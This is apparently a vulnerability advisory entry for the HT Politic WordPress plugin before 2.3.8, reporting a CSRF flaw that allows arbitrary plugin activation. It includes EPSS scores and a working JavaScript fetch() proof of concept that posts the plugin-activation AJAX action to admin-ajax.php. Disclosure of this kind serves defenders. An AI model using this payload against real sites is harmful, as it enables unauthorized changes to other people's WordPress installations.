Lucene search

K
wpexploitLana CodesWPEX-ID:B427841D-A3AD-4E3A-8964-BAAD90A9AEDB
HistoryFeb 28, 2023 - 12:00 a.m.

HT Politic < 2.3.8 - Arbitrary Plugin Activation via CSRF

2023-02-2800:00:00
Lana Codes
46
csrf
arbitrary plugin activation
woocommerce plugin

0.001 Low

EPSS

Percentile

29.6%

The plugin does not have CSRF check when activating plugins, which could allow attackers to make logged in admins activate arbitrary plugins present on the blog via a CSRF attack

activate woocommerce plugin exploit:

fetch('http://localhost/wp-admin/admin-ajax.php', {
        method: 'POST',
        headers: new Headers({
            'Content-Type': 'application/x-www-form-urlencoded',
        }),
        body: 'action=wppolitic_ajax_plugin_activation&location=woocommerce/woocommerce.php',
        redirect: 'follow'
    }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));

0.001 Low

EPSS

Percentile

29.6%

Related for WPEX-ID:B427841D-A3AD-4E3A-8964-BAAD90A9AEDB